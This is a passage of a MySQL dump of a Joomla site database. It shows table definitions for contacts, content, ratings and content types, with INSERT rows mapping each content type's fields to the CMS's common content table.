00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',42,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1); /*!40000 ALTER TABLE `qo1a2_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_contact_details` -- DROP TABLE IF EXISTS `qo1a2_contact_details`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_contact_details` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `con_position` varchar(255) DEFAULT NULL, `address` text, `suburb` varchar(100) DEFAULT NULL, `state` varchar(100) DEFAULT NULL, `country` varchar(100) DEFAULT NULL, `postcode` varchar(100) DEFAULT NULL, `telephone` varchar(255) DEFAULT NULL, `fax` varchar(255) DEFAULT NULL, `misc` mediumtext, `image` varchar(255) DEFAULT NULL, `email_to` varchar(255) DEFAULT NULL, `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0', `published` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) NOT NULL DEFAULT '0', `params` text NOT NULL, `user_id` int(11) NOT NULL DEFAULT '0', `catid` int(11) NOT NULL DEFAULT '0', `access` int(10) unsigned NOT NULL DEFAULT '0', `mobile` varchar(255) NOT NULL DEFAULT '', `webpage` varchar(255) NOT NULL DEFAULT '', `sortname1` varchar(255) NOT NULL, `sortname2` varchar(255) NOT NULL, `sortname3` varchar(255) NOT NULL, `language` char(7) NOT NULL, `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `version` int(10) unsigned NOT NULL DEFAULT '1', `hits` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_contact_details` -- LOCK TABLES `qo1a2_contact_details` WRITE; /*!40000 ALTER TABLE `qo1a2_contact_details` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_contact_details` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_content` -- DROP TABLE IF EXISTS `qo1a2_content`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_content` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.', `title` varchar(255) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `introtext` mediumtext NOT NULL, `fulltext` mediumtext NOT NULL, `state` tinyint(3) NOT NULL DEFAULT '0', `catid` int(10) unsigned NOT NULL DEFAULT '0', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `attribs` varchar(5120) NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', `ordering` int(11) NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `access` int(10) unsigned NOT NULL DEFAULT '0', `hits` int(10) unsigned NOT NULL DEFAULT '0', `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.', `language` char(7) NOT NULL COMMENT 'The language code for the article.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`state`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_content` -- LOCK TABLES `qo1a2_content` WRITE; /*!40000 ALTER TABLE `qo1a2_content` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_content_frontpage` -- DROP TABLE IF EXISTS `qo1a2_content_frontpage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_content_frontpage` ( `content_id` int(11) NOT NULL DEFAULT '0', `ordering` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_content_frontpage` -- LOCK TABLES `qo1a2_content_frontpage` WRITE; /*!40000 ALTER TABLE `qo1a2_content_frontpage` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_content_frontpage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_content_rating` -- DROP TABLE IF EXISTS `qo1a2_content_rating`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_content_rating` ( `content_id` int(11) NOT NULL DEFAULT '0', `rating_sum` int(10) unsigned NOT NULL DEFAULT '0', `rating_count` int(10) unsigned NOT NULL DEFAULT '0', `lastip` varchar(50) NOT NULL DEFAULT '', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_content_rating` -- LOCK TABLES `qo1a2_content_rating` WRITE; /*!40000 ALTER TABLE `qo1a2_content_rating` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_content_rating` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_content_types` -- DROP TABLE IF EXISTS `qo1a2_content_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_content_types` ( `type_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `type_title` varchar(255) NOT NULL DEFAULT '', `type_alias` varchar(255) NOT NULL DEFAULT '', `table` varchar(255) NOT NULL DEFAULT '', `rules` text NOT NULL, `field_mappings` text NOT NULL, `router` varchar(255) NOT NULL DEFAULT '', `content_history_options` varchar(5120) DEFAULT NULL COMMENT 'JSON string for com_contenthistory options', PRIMARY KEY (`type_id`), KEY `idx_alias` (`type_alias`) ) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_content_types` -- LOCK TABLES `qo1a2_content_types` WRITE; /*!40000 ALTER TABLE `qo1a2_content_types` DISABLE KEYS */; INSERT INTO `qo1a2_content_types` VALUES (1,'Article','com_content.article','{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\"}, \"special\":{\"fulltext\":\"fulltext\"}}','ContentHelperRoute::getArticleRoute','{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(2,'Weblink','com_weblinks.weblink','{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{}}','WeblinksHelperRoute::getWeblinkRoute','{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(3,'Contact','com_contact.contact','{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}','ContactHelperRoute::getContactRoute','{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),(4,'Newsfeed','com_newsfeeds.newsfeed','{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}','NewsfeedsHelperRoute::getNewsfeedRoute','{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(5,'User','com_users.user','{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{}}','UsersHelperRoute::getUserRoute',''),(6,'Article Category','com_content.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContentHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(7,'Contact Category','com_contact.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContactHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(8,'Newsfeeds Category','com_newsfeeds.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','NewsfeedsHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(9,'Weblinks Category','com_weblinks.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','WeblinksHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10,'Tag','com_tags.tag','{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}','TagsHelperRoute::getTagRoute','{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(11,'Banner','com_banners.banner','{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", 